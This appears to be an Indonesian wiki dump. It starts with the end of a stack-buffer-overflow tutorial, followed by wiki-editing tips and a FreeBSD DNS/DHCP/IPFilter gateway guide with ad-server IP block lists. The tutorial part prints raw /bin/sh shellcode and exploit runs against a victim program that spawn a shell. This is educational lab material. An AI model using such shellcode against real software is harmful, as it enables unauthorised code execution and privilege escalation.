ë_W1ÀïùüªX«1À«PÇøWÿ7P°;ÍìêÉÃèÜÿÿÿ/bin/sh012345678
codelength=54, bufsize=300, mid=152 (300-148)
ESP: xBFBFFB60, Offset: 0 (x0), Effective: xBFBFFB60, Alignment 0
Environment variable: "BUF"

Program exploit membuka shell baru dengan environment "BUF" yang
di-set sesuai exploit-code (300 bytes). Lalu inputkan
exploit-code tsb. menjadi argumen untuk program victim:

[aa]$./victim "$BUF"
ë_W1ÀïùüªX«1À«PÇøWÿ7P°;ÍìêÉÃèÜÿÿÿ/bin/sh012345678¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿`û¿¿
Bus error (core dumped)
[aa]$

Yaah... hasilnya kacau :(, kita keluar saja deh...

[aa]$exit
exit
[aa]$

Rupanya ada yang kelupaan, karena exploitable-buffer dalam
program victim diatas besarnya adalah 256 bytes, maka sebaiknya
kita kurangi SP sebesar kira-kira segitu, yaitu dengan
menggunakan offset, misalnya 200 lah...

[aa]$./exploit 300 200
shellcode=
ë_W1ÀïùüªX«1À«PÇøWÿ7P°;ÍìêÉÃèÜÿÿÿ/bin/sh012345678
codelength=54, bufsize=300, mid=152 (300-148)
ESP: xBFBFFB60, Offset: 200 (xC8), Effective: xBFBFFA98, Alignment 0
Environment variable: "BUF"
[aa]$

Dengan cara yang sama seperti diatas, kita embat lagi buffernya

[aa]$./victim "$BUF"
ë_W1ÀïùüªX«1À«PÇøWÿ7P°;ÍìêÉÃèÜÿÿÿ/bin/sh012345678¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿ú¿¿
$ => (INI ADALAH SHELL)

Wow! kereen... :).

$ exit
[aa]$exit
exit
[aa]$

Coba lagi nilai lainnya, nilai offset mestinya lebih besar dari
mid (middle point of buffer) supaya return address jatuhnya di
bantalan NOP yang empuk.

[aa]$./exploit 400 300
shellcode=
ë_W1ÀïùüªX«1À«PÇøWÿ7P°;ÍìêÉÃèÜÿÿÿ/bin/sh012345678
codelength=54, bufsize=400, mid=200 (400-200)
ESP: xBFBFFB60, Offset: 300 (x12C), Effective: xBFBFFA34, Alignment 0
Environment variable: "BUF"
[aa]$./victim "$BUF"
ë_W1ÀïùüªX«1À«PÇøWÿ7P°;ÍìêÉÃèÜÿÿÿ/bin/sh012345678¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿4ú¿¿
$ => (INI ADALAH SHELL)

Gracias!

$ exit
[aa]$exit
exit
[aa]$

4. Penutup
Udah-ah, capek :)
_________________________________________________________________
Bacaan:
"Smashing the Stack for Fun and Profit", Aleph One, Phrack Magazine 49, Volume Seven, Issue FortyNine, File 14.
_________________________________________________________________
by: aa,
kritik dan saran: aa.delphi.AT.yahoo.DOT.com
jakarta,
20030406
20030415
20030417

Langkah Singkat Untuk Aktif Menulis di Wiki

2008-07-29T15:13:24Z

Aa:

1. Membuat account di Wiki.
* Menu untuk membuat account terdapat di bagian login.
* Masukan data yang dibutuhkan untuk membuat account, seperti, username, password, e-mail anda.

2. '''Login ke Wiki dengan username & password yang baru dibuat.''' Perlu di catat disini bahwa Wiki tidak akan mengijinkan anda untuk mengedit sesuatu jika tidak login ke Wiki. Ini dilakukan sebagai proteksi terhadap spammer.

3. Masukan judul / kalimat / keyword dari kata yang ingin anda terangkan.
* Jika judul tersebut belum ada, biasanya anda akan di berikan pilihan untuk menuliskan artikel tentang judul / keyword tersebut.

4. Klik simpan / save, jika tulisan anda anggap cukup.

Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global

2008-07-27T04:00:54Z

Aa: /* DNS Server in the sand-box */

Sumber: aa, aa.delphi@yahoo.com
URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Dalam tulisan ini akan dibahas (mudah-mudahan) secara cukup detail, bagaimana mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global, baik dinamik maupun statik (dial-up PPP, Cable-Modem atau DSL).

Model network seperti ini merupakan model yang sangat umum digunakan oleh warnet serta perusahaan kecil yang berniat untuk memberikan akses internet yang murah meriah bagi para karyawannya.

Teknik yang akan dibahas ini merupakan salah satu (mungkin merupakan yang terbaik) dibandingkan dengan alternatif lainnya seperti menggunakan hardware tertentu (modem dengan kapabilitas internet sharing), kelemahan: jumlah host sangat terbatas, antara 2 - 8, serta fleksibilitasnya sangat rendah, hampir tanpa menggunakan pengamanan dari intruder.

Pilihan lainnya adalah dengan sistem operasi MS Windows (yang sudah sangat familiar), fleksibilitas cukup, namun dengan tingkat pengamanan yang relatif rendah.

Pilihan OS lainnya seperti Linux, OpenBSD atau Solaris bisa juga diperhitungkan, namun overall performance, kombinasi FreeBSD dan IPF adalah yang terbaik dinilai dari segi keamanan/security, performansi, dukungan resources (software, kompatibilitas, utilitas dan dokumentasi) yang tersedia, serta biaya yang dibutuhkan. Dengan FreeBSD mesin 386 tua milik kita disulap menjadi sebuah server yang powerful, robust dan tahan banting.

cat: IPF (IPFilter) adalah paket firewal native dari OpenBSD, sistem operasi yang selama ini dinilai sebagai salah satu OS yang dianggap paling secure.

==Topologi Network==
<pre>
===============================================

_____
| ISP |
|_____|
DNS: 202.155.0.10, 202.155.0.20
|
| 10.20.30.40
___|___
|FreeBSD|...........
|_______| Virtual-Host 192.168.2.1
my.domain.box| Gateway
192.168.1.1 | Firewall - IPF/IPNAT
| DNS Server - BIND
Network: | HTTP Server - Apache
192.168.1.0 | Proxy Server - Squid
255.255.255.0| SQL Server - MySQL
|
|
_________|____...___
| | | |
__|__ __|__ __|__ __|__
Host1 Host2 Host3 HostN
</pre>

Ada 3 pokok bahasan utama dalam kasus ini.
# DNS
# DHCP Server
# IPF/IPNAT

lain-lain: Apache, MySQL dan Squid tidak akan dibahas panjang karena tidak esensial dalam konteks ini.

==DNS==

Untuk mengaktifkan name server jalankan /stand/sysinstal pilih menu Configure, kemudian Startup, lalu aktifkan (enable) named. Jika anda ingin menjalankan named dalam sandbox, isi named flags dengan argumen seperti dalam uraian butir 1.3.

Cara lainnya adalah dengan mengedit langsung /etc/rc.conf, ganti atau tambahkan entri di

/etc/rc.conf:
named_enable="yes"
named_flags="" #lihat uraian selanjutnya

==Cache-Only DNS Server==

Konfigurasi DNS yang paling sederhana, yang kemungkinan besar akan berjalan lancar adalah menggunakan konfigurasi jenis cache-only DNS Server, artinya server DNS kita TIDAK memiliki otoritas atas satu zone-pun juga kecuali localhost dan loopback network 127.

Kekurangan dari model DNS Server seperti ini adalah, tentu saja, host-host dalam network kita tidak dapat saling mengenal. Hal ini bisa kita uji dengan perintah ping dari satu host terhadap host lainnya.

cat.: Dalam terminologi BIND, zone adalah suatu area network dimana sebuah server DNS memiliki otoritas atas pengaturan nama atas host-host yang ada di dalamnya.

Untuk network yang relatif sederhana seperti pada small-office atau di organisasi kecil, suatu zone umumnya hanya berupa satu domain, sementara di organisasi yang cukup besar, seperti di lingkungan kampus dan terutama di sebuah ISP, biasanya sebuah server DNS akan menangani suatu zone yang terdiri atas lebih dari satu domain.

==Konfigurasi dalam named.conf==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP kita misalnya:
202.155.0.10;
202.155.0.20;
};
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

zone "." {
type hint;
file "root.servers";
};
</pre>

==File-file database==

==File localhost.rev:==

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.
1 IN PTR localhost.domain.box.

cat.: Untuk menghindari salah ketik, sebaiknya kita cukup menjalankan perintah: sh make-localhost di direktori /etc/namedb.

==File root.servers:==
File ini tidak perlu dirubah, biarkan saja sesuai defaultnya.

==Internal-Root DNS Server==
Seperti dapat dilihat pada gambar diatas, network kita termasuk kedalam network kelas C, dengan alamat 192.168.1.0 dan netmask 255.255.255.0. IP address network card pertama (if_1) ditetapkan oleh ISP, sementara if_2 dapat kita tentukan sendiri.

Selanjutnya kita dapat menetapkan hal-hal sebagai berikut:

Zone/domain: domain.box
Reverse-Network: 1.168.192.in-addr.arpa
Server address: 192.168.1.1
Server name: my.domain.box

==Konfigurasi dalam named.conf:==

==Konfigurasi awal (Cache-Only DNS Server):==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP:
202.155.0.10;
202.155.0.20;
};
version "19.09.1969";
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};
</pre>

==Konfigurasi named.conf yang perlu ditambahkan (atau dirubah):==
<pre>
forward;

zone "domain.box" {
type master;
file "box/domain.db";
};

zone "1.168.192.in-addr.arpa" {
type master;
file "box/domain.rev";
};

zone "." {
type hint;
//file "root.servers";
file "box/root.box";
};
</pre>

==File-file database==

==File localhost.rev:==

Tidak perlu ada perubahan dalam file ini, sama dengan butir 1.1.2.1 diatas.

==File domain.db:==

Berisi daftar translasi name to address untuk seluruh host yang ada di domain domain.box, hati-hati character comment di sini adalah semi-colon (;) bukan hash (#).
<pre>
@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

localhost IN A 127.0.0.1

my IN A 192.168.1.1
host1 in cname my
host2 IN A 192.168.1.2
host3 IN A 192.168.1.3
..
..
..
host254 IN A 192.168.1.254
</pre>

cat.: Perhatikan bahwa dalam database ini kita perlu menambahkan entri untuk localhost, sehingga setiap rujukan atas localhost, dari manapun juga, akan diarahkan ke loopback masing-masing.

==File domain.rev:==
Kebalikan dari domain.db, merupakan reverse address to name atas domain.box untuk network 192.168.1.0/24
<pre>
@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

1 IN PTR my
2 IN PTR host1
3 IN PTR host2
..
254 IN PTR host254
</pre>

cat.: Perhatikan bahwa tidak bisa dilakukan reverse untuk alias atau CNAME (canonical-name). Tidak diperbolehkan terdapat *dua entri yang sama* untuk *satu nomor address*, atau dengan kata lain, satu nomor adress tidak boleh merujuk kepada dua nama yang berbeda. Sebaliknya bisa saja terdapat dua nomor address untuk satu nama, misalnya jika kita memiliki dua atau lebih network card dalam satu host yang masing-masing memiliki IP sendiri.

==File root.box:==

File ini merupakan modifikasi dari file root.servers, yaitu dengan menambahkan RR (Resource Record) yang menyatakan bahwa server kita memiliki otoritas atas root domain.
<pre>
@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

;domain "domain.box" didelegasikan langsung dari root
domain.box. 9999999 IN NS my.domain.box.

;juga reverse dari class-C network
1.168.192.in-addr.arpa 9999999 IN NS my.domain.box.

;glue records
my.domain.box. IN A 192.168.1.1

;daftar root server selanjutnya sama dengan default di file root.servers
..
</pre>

==DNS Server in the sand-box==

Konfigurasi server DNS ini terutama ditujukan untuk memperketat sekuriti sistem network, prinsipnya sederhana, yaitu menjalankan servis DNS (named) oleh non-privilege user, untuk ini biasanya sengaja dibuat satu user khusus, tanpa fasilitas login.
Sebenarnya untuk model network kita yang sederhana, ancaman sekuriti yang ada mungkin tidak akan terlalu serius. Konfigurasi ini bisa jadi sebagai opsi yang bisa diambil ataupun tidak.

1.3.1
Buat user baru untuk servis DNS, misalnya dengan nama: bind.
User group: bind (default)
User home: /usr/local/bind
shell: no, nologin atau nonexistent

1.3.2
ganti atau tambahkan entri di /etc/rc.conf:
named_flags="-u bind -g bind -w /usr/local/bind -c named.conf -t /usr/local/bind"

Penjelasan atas argumen:
-u dan -g: user serta group yang menjalankan servis DNS adalah "bind".
-w dan -c: direktori kerja dan nama file konfigurasi yang dipakai.
-t: setelah melakukan inisialisasi, servis DNS menjadikan /usr/local/bind
sebagai root direktorinya (chroot).

Dengan penggantian user, group dan chroot, servis DNS ini tidak lagi memiliki akses tak-terbatas atas resources, sehingga perlu dilakukan lagi beberapa penyesuaian:

1.3.2.1

Servis named dan ndc biasanya menampilkan prosess-id-nya dibawah sub-direktori /var/run, karena root-directory-nya berubah, maka kita harus membuat secara manual subdirektori /var/run dibawah /usr/local/bind, jangan lupa ownershipnya harus disesuaikan menjadi bind:bind

1.3.2.1

Jika penyesuaian sub-direktori diatas tidak dilakukan maka setidaknya harus dibuat penyesuaian dalam option named.conf:
[pre]
options {
...

directory "/"; //(atau mudahnya hapus saja option ini)
pid-file "named.pid" //named.pid berada di direktori root yang baru

...
}
[/pre]

1.3.3

Pindahkan atau salin /etc/namedb ke /usr/local/bind.

cat.: Perhatikan ownership dari /usr/local/bind, jika kita menyalinnya dengan tool atau file-manager seperti midnight- commander, biasanya ownership akan berubah dari bind ke root (atau privileged user pada saat itu), sehingga harus dikembalikan lagi dengan chown -r bind:bind /usr/local/bind.

Penyesuaian ownership ini juga berlaku untuk direktori baru dibawahnya yang kelak digunakan untuk file-file yang meminta akses-tulis seperti log, dump, stat, pid, dsb.

1.3.4

Hentikan proses named yang saat itu berlangsung (dengan kill, killall atau top), lalu aktifkan kembali named (dengan argumen seperti named_flags diatas), atau reboot server.

2. DHCP Server

2.1. Instalasi dan Setup

Dengan /stand/sysinstall, install package isc-dhcpd.
Instalasi ini hanya sekedar mengekstrak program dan dokumentasi dhcpd, kita *harus* membuat sebuah file yaitu /var/db/dhcpd.lease secara manual: touch /var/db/dhcpd.leases.
Edit file /usr/local/etc/dhcpd.conf dengan editor kesayangan anda, fi-ay :), dan buat alokasi dinamis IP addresses untuk network 192.168.1.0/24 misalnya:

#jangan lupa menggunakan fasilitas syslog
#dalam syslog.conf tambahkan entry sbb:
# local7* /var/log/dhcpd.log #awas: pake TAB, jangan pake spasi!

log-facility local7;
authoritative;
ddns-update-style ad-hoc;

option domain-name "domain.box";

subnet 192.168.1.0 netmask 255.255.255.0 {
option netbios-name-servers 192.168.1.3; #server NT kita
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
pool { range 192.168.1.10 192.168.1.190; }
}

2.2. Menjalankan dhcpd
DHCP server sebaiknya dijalankan pada saat boot-up dengan membuat file startup di /usr/local/etc/rc.d
Untuk menjalankan secara manual ketikan perintah: dhcpd if_2 (if_2 adalah interface yang terhubung dengan network lokal)

3.IPF/IPNAT

'Official' firewall dari FreeBSD adalah ipfw/natd, kelebihan ipfw terutama adalah kemampuan untuk mengatur kuota bandwith, sementara kelebihan ipf/ipnat yang paling utama adalah performansi. Juga menurut authornya, ipf benar-benar melakukan kontrol terhadap TCP/IP state, tidak cuma artifisial (sekedar mengecek kombinasi flags tertentu seperti SYN/ACK) seperti yang dilakukan dalam paket firewall lainnya.

Dalam bahasan kali ini, kita akan menggunakan IPFilter/IPNAT.

3.1. Kompilasi kernel

Untuk memasang firewall kita harus mengkompile ulang kernel (selanjutnya kita bisa mencopot-pasang lagi lewat loadable kernel module).

3.1.1 Konfigurasi kernel

cd /usr/src/sys/i386/conf
option tambahan kernel kita dari GENERIC adalah sbb:
<pre>
#--- start kernel options ---
#hapus semua options cpu kecuali model tertinggi sesuai cpu anda
#cpu I386_CPU
#cpu I486_CPU
#cpu I586_CPU
cpu I686_CPU
maxusers 32

#kostumisasi kernel (lihat juga catatan tambahan)
ident AA
makeoptions KERNEL=AA

#jangan lupa mengganti entri di /boot atau /etc/defaults/rc.conf
#userconfig_script_load="YES"
#kernel="/AA"
#verbose_loading="YES"
#autoboot_delay="3"
#bootfile="AA,aa,kernel"

#kita tidak memakai 386SX kebawah, jadi emulasi mathco bisa dihapus saja
#options GPL_MATH_EMULATE #Support for x87 emulation

#console menggunakan teks mode 90x60
device vga0 at isa?
options VGA_WIDTH90 #90 baris VGA
options VESA

#jangan lupa nanti tambahkan font dan screenflags di /etc/rc.conf sbb:
#font8x14="cp437-8x14"
#font8x16="cp437-8x16"
#font8x8="cp437-8x8"
#allscreens_flags="VGA_90x60"

#hapus splash screen/screen saver.
#pseudo-device splash

#selain UFS, dalam box kita terdapat juga NTFS dan EXT2FS
options NTFS #NT
options EXT2FS #Linux
options NFS_NOSERVER #Membuang kode NFS

#options UNION #UFS bisa digabung
#options NULLFS #null
#options UMAPFS #UID Map FileSystem
#options KERNFS #kernel
#options SMBFS #SMB/File Sharing ala Windows
#options PROCFS #memetakan Process ID

# Tambahkan flags 0xb0ff (maks. drive blok transfer) untuk hard-disk
# untuk sepasang hard-disk per-interface flagsnya adalah 0xb0ffb0ff
device ata0 at isa? port IO_WD1 irq 14 flags 0xb0ffb0ff
device ata1 at isa? port IO_WD2 irq 15 flags 0xb0ffb0ff

options SOFTUPDATES #penting untuk meningkatkan performansi
options ATA_STATIC_ID #Static device numbering

#hapus saja tape-drive.
#device atapist # ATAPI tape drives

# jika menggunakan APM, sebaiknya tidak.
#device apm0 at nexus? disable flags 0x20 # Advanced Power Management

# PCCARD (PCMCIA) support, buang saja
#device card
#device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000
#device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable

#Buang saja serial 2 dan 3
#device sio2 at isa? disable port IO_COM3 irq 5
#device sio3 at isa? disable port IO_COM4 irq 9

#Buang juga koneksi lewat Parallel port
#device plip # TCP/IP over parallel
#device ppi # Parallel port interface device
#device vpo # Requires scbus and da

#Buang semua entri ethernet yang tidak ada
#saya cuma punya 3Com 3C509, 3C905 dan realtek
device ep # 3Com 3C509 (10 MBps)
device xl # 3Com 3c905 (10/100)
device rl # RealTek 8129/8139 (10/100)
#device de # Realtek lama (10)

#Banyak software yang tergantung kepada bpf
#(discouraged), tapi sebaiknya tetap dipasang
pseudo-device bpf #Berkeley packet filter

#Buang semua options USB yang hardwarenya tidak ada
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device usb # USB Bus (required)
device ugen # Generic
#device uhid # "Human Interface Devices"
#device ukbd # Keyboard
#device ulpt # Printer
#device umass # Disks/Mass storage - Requires scbus and da
#device ums # Mouse
#device uscanner # Scanners
# USB Ethernet, requires mii
#device aue # ADMtek USB ethernet
#device cue # CATC USB ethernet
#device kue # Kawasaki LSI USB ethernet

#Soundcard (generik)
device pcm

#jangan lupa nanti untuk membuat entri2 sound
#(audio, mixer, sequencer dll) di /dev:
#cd /dev
#./MAKEDEV snd

#Intel PIIX4 Power Management Unit
#device smbus
#device intpm

#Berhubung SCSI card saya sudah sangat kuno, akhirnya saya cabut :)
#Jika tidak memiliki SCSI, semua options yang behubungan dengan skasi
#bisa dibuang

#options SCSI_DELAY=8000 #Delay (in ms) before probing SCSI
# SCSI Controllers
#...
# SCSI peripherals
#...

#Jika menggunakan firewall bawaan FreeBSD:
#options IPFIREWALL
#options IPDIVERT
#options IPFIREWALL_VERBOSE
#options IPFIREWALL_VERBOSE_LIMIT=32
#options IPFIREWALL_DEFAULT_TO_ACCEPT

#Jika anda memasang bandwith quota tambahkan entri dibawah ini
#options IPDIVERT #digunakan juga oleh ipfw/natd
#options DUMMYNET
#options QUOTA

#Konfigurasi ipfilter/ipnat ini yang kita pakai
#cat. jika menggunakan IPFilter TIDAK PERLU ditambahkan
#lagi options IPDIVERT seperti yang terdapat dalam
#beberapa dokumentasi online

options IPFILTER
options IPFILTER_LOG
options IPFILTER_DEFAULT_BLOCK

#untuk memperketat firewall bisa ditambahkan options dibawah ini:
options IPSTEALTH
options TCP_DROP_SYNFIN
options TCP_RESTRICT_RST

options MROUTING
options RANDOM_IP_ID

#beberapa options lainnya untuk memacu performa
options NBUF=4096
options NMBCLUSTERS=8192

#catatan tambahan:

#Jika anda ingin mengubah release, copyright et-al., lakukan perubahan ini
#di /usr/src/sys/conf/newvers.sh

#dari original
#TYPE="FreeBSD"
#REVISION="4.3"
#BRANCH="RELEASE"
#RELEASE=4.3-RELEASE
#VERSION="${TYPE} ${RELEASE}"
if [ X"$COPYRIGHT" = X ]; then
COPYRIGHT="/*
* Copyright (c) $year
* FreeBSD Inc. All rights reserved.
*
*/"
fi

#menjadi violated
TYPE="mbakNunix"
REVISION="1.31"
BRANCH="BURIX"
RELEASE=1.31-BURIX
VERSION="${TYPE} ${RELEASE}"
COPYRIGHT="
/*** aa, aa.delphi@yahoo.com, 1995-$year ***/
"
</pre>
2.1.2 Kompilasi

Akhirnya kita kompile kernel sbb:
<pre>
su (kita harus root)
cd /usr/src/sys/i386/conf
chflags noschg AA (jika sekuriti diperketat, biasanya kernel diberi flag schg)

/usr/sbin/config -r AA && \
cd ../../compile/$1 && \
(make depend) 2>~/err1 && \
make 2>~/err2 && \
(make install) 2>~/err3
</pre>
semua error message masing-masing akan dicatat di /root, file: err1, err2 dan err3

3.2. Mengkonfigurasi IPF/IPNAT

3.2.1. Konfigurasi rc.conf
Konfigurasi umum seperti biasa dilakukan di rc.conf

3.2.2. Konfigurasi syslog.conf

3.2.3. Tuning sysctl.conf
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1

3.2.4. ipnat.rules
Rules untuk IPNAT dibahas lebih dulu karena relatif jauh lebih sederhana daripada rules untuk IPF

Catatan:
map artinya: remap SOURCE packet's IP address
rdr artinya: redirect DESTINATION of packet's IP address

Tambahkan baris berikut untuk mengemap :) port ftp

map rl1 192.168.1.0/24 -> 0/32 proxy port 21 ftp/tcp
map rl1 192.168.1.0/24 -> 0/32 portmap tcp/udp 49152:65535 #nomor port bebas antara 0-65535
map rl1 192.168.1.0/24 -> 0/32

HTTP request di redirect ke server

rdr rl1 0/32 port 80 -> 192.168.1.1 port 80 tcp

#jika perlu permintaan http dari lokal bisa di redirect ke SQUID port 3128
#rdr rl0 0.0.0.0/0 port 80 -> 192.168.1.1 port 3128 tcp

3.2.5. ipf.rules

Default konfigurasi adalah block in all, block out all artinya dengan konfigurasi seperti ini server kita benar-benar jadi mahluk egois, tidak mau melihat kanan-kiri sedikitpun :)

konfigurasi paling sederhana yang bisa berjalan adalah:

pass in all
pass out all

Artinya sama saja dengan tidak memasang firewall.

jika server kita hanya digunakan untuk mengakses internet keluar (outward-only), cukup kita isi firewall rules dengan satu baris:

pass out quick all keep state keep frags

untuk ipf ver 4.32 (FreeBSD 4.5+) rule "keep" tidak bisa diterapkan kepada paket selain tcp/udp/icmp, jadi rule diatas dibagi menjadi:

pass out quick proto tcp/udp all keep state keep frags
pass out quick proto icmp all keep state keep frags
pass out quick all

Dengan menggunakan keep state, kita tinggal membuka port yang kita perlukan saja, lalu-lintas koneksi yang terkait dengan servis/port tsb selanjutnya ditangani oleh ipf, misalnya:

block in quick all
pass out quick proto icmp all icmp-type echo keep state

meski diatas terdapat block, icmp-reply akan tetap bisa masuk masuk karena memang diminta oleh icmp-echo.
pada protokol tcp/udp lainnya, pembukaan gerbang masuk ini mencakup juga control messages berupa icmp atau bahkan segmen IP dengan nomor port lainnya yang berbeda, yang masih terkait dalam koneksi tersebut.

catatan tambahan:
Sebaiknya keep-state jangan terlalu di-obral supaya tidak menghabiskan resources atau bahkan membuka celah security berupa Denial of Service (DoS) Attack, lebih tepat kiranya jika hanya protokol TCP dengan SYN Flag serta port-port tertentu saja yang dipasangi keep-state seperti FTP (21), SSH (22), SMTP (25), DNS (53), DHCP (67/58), serta ICMP echo.
Jika hanya permintaan koneksi (ditandai dengan SYN flag) dari servis/port tertentu yang dibuka, jalur masuk semua ditutup (block in all), port FTP mau tidak mau harus diberi keep state karena setelah koneksi terjadi dia akan membuka port/jalur baru (UDP port 20, atau TCP dengan unassigned [high number] port) untuk komunikasi data.

pass out quick proto tcp flags S keep state
pass out quick proto udp port = 53 keep state
pass out quick proto icmp all icmp-type echo keep state
pass out quick all

Karena pembahasan ipf ini cukup panjang, maka akan kita singkat saja dengan menggunakan rules yang berguna secara umum

<pre>
#UMUM
pass in quick on lo0
pass out quick on lo0

#NBNS
block return-rst in quick proto tcp all port 136 >< 140
block return-icmp-as-dest(port-unr) in quick all port 136 >< 140

#============================================================
#if_1 adalah eksternal interface (yang terhubung ke internet)
#============================================================

#INWARD
#------
block in quick on if_1 all head 10000
#Start group 10000

block in quick all with opt lsrr group 10000 #block loose src routing
block in quick all with opt ssrr group 10000 #block strict src routing
block in quick proto tcp all with frags group 10000

#block no. ip address yang diketahui berbahaya, bervirus dsb.
#block in quick proto tcp/udp from Danger_IPs group 10000
#(lihat daftar 3.2.5.2)

pass in quick proto tcp all port = http flags S keep state group 10000 #jika kita pasang web server

block in quick proto icmp all head 11000 group 10000 #blok icmp yang tidak perlu
#Start group 11000
#pass in log first quick proto icmp all icmp-type echo group 11000
pass in quick proto icmp all icmp-type echorep group 11000
pass in quick proto icmp all icmp-type unreach group 11000
pass in quick proto icmp all icmp-type redir group 11000
pass in quick proto icmp all icmp-type timex group 11000
block in return-icmp-as-dest(host-unr) in quick all group 11000
#End group 11000

#__________________________________________________
block return-rst in quick proto tcp all group 10000
block return-icmp-as-dest(port-unr) in quick all group 10000

#End group 10000

#OUTWARD bebas
#-------------
block out quick on if_1 all head 20000
pass out quick proto tcp/udp all keep state keep frags group 20000
pass out quick proto icmp all keep state keep frags 20000
pass out quick all 20000

#===========================================================
#if_2 adalah internal interface (yang terhubung ke intranet)
#===========================================================

#INWARD
#------
block in quick on if_2 all head 30000
#Start group 30000

#Test User, tahan uninitialized host
block in quick from !192.168.1.1/24 to any head 31000 group 30000
#Start group 31000

#Unknown User, harus daftar dhcp dulu
pass in log first quick proto tcp/udp from any port = 68 to any port = 67 group 31000
block return-icmp-as-dest(host-unk) in log first quick all group 31000 #Unknown

#HTTP
#Tahan dulu http untuk diinterogasi, mau kemanakah tujuannya.
block in log first quick all port = http head 32000 group 31000
#Start group 32000

#HTTP block template: popups, junker, spammer etc. dilarang!
block return-rst in log first quick proto tcp from any to 64.38.238.0/18 group 32000 #ADS!
block return-rst in log first quick proto tcp from any to 66.28.153.36/24 group 32000 #porn&spy!
#...dst (lihat daftar 3.2.5.1 yang berisi IP popups/spyies)

#aman...
pass in log first quick proto tcp all flags S keep state keep frags group 32000

#HTTP-TCP only, yg lainnya di-blok by default!
block return-rst in quick proto tcp all group 32000

#End group 32000
#End group 31000

#Pada tahap ini user telah dikenal (dari 192.168.1.1/24) dan dengan permintaan port selain http
#atau user dari 192.168.1.1/24 dengan port http namun protokolnya selain tcp

#Tahan permintaan DNS keluar
block return-icmp-as-dest(filter-prohib) in quick proto tcp/udp from any to 202.155.0.10/24 port = domain group 30000

pass in log first quick proto tcp/udp all port < 1024 keep state group 30000 #regular ports
pass in log first quick proto tcp/udp all port = 3130 keep state group 30000 #SQUID
pass in log first quick proto tcp/udp all port = 3306 keep state group 30000 #MySQL

#__________________________________________________
#lainnya secara default di-blok
block return-rst in quick proto tcp all group 30000
block return-icmp-as-dest(port-unr) in quick all group 30000

#End group 30000

#OUTWARD bebas
#-------------
block out quick on if_2 all head 40000
pass out quick proto tcp/udp all keep state keep frags 40000
pass out quick proto icmp all keep state keep frags 40000
pass out quick all 40000
</pre>

3.2.5.1 Daftar alamat IP popup
Berikut ini daftar ip popup dan advertising banner, spy, spammer dll yang selain menyebalkan juga kadang berbahaya.
cat.: ganti kata "BLOK" dengan: "block return-rst in log first quick proto tcp from any to", juga nomor group disesuaikan dengan konfigurasi
<pre>
#HTTP block template

#Hall Of Fames - top of sh*ts!-
BLOK 64.38.238.0/18 group 42000 #popups.ini
BLOK 64.38.223.51/24 group 42000 #!!!trafficcashgold.com
BLOK 64.38.226.6/24 group 42000 #maxcash.cavecreek.net
BLOK 64.38.247.60/24 group 42000 #count1-old.paycounter.com[]
BLOK 205.180.85.40/24 group 42000 #popups.ini TOP!!! media.fastclick.net
BLOK 202.180.8.129/24 group 42000 #ns1.servercyber.com
BLOK 207.68.178.251/24 group 42000 #ads.msn.com
BLOK 207.68.185.58/24 group 42000 #autosearch.msn.com
BLOK 207.68.171.254/24 group 42000 #adobe-spy
BLOK 207.68.172.253/24 group 42000 #adobe-spy
BLOK 207.68.173.254/22 group 42000 #adobe-spy
BLOK 209.225.0.6/24 group 42000 #servedby.advertising.com
BLOK 209.225.4.72/24 group 42000 #advertising.com

#telkom!dont-block: BLOK 203.130.252.36/24 group 42000 #mencurigakan sih

#dangerous!
BLOK 66.28.38.3/24 group 42000 #
BLOK 209.50.252.100/24 group 42000 #4bigcash.com
BLOK 209.5.187.10/24 group 42000 #freepopups.com
#BLOK 209.5.187.16/24 group 42000 #adpowerzone.com
#BLOK 213.249.1.67/24 group 42000 #d67.kif2.nas.panafonet.gr
#End dangerous

#from popups.ini
BLOK 12.42.235.3/24 group 42000 #popups.ini
#...long-list...
BLOK 216.95.228.15/24 group 42000 #popups.ini
#end-from popups.ini

#new compilation
#BLOK 66.206.15.201/24 group 42000 #indo-porn, gapapa-lah
BLOK 63.167.204.56/24 group 42000 #7adpower.com
#...long-list...
BLOK 128.11.42.61/24 group 42000 #burstnet.com
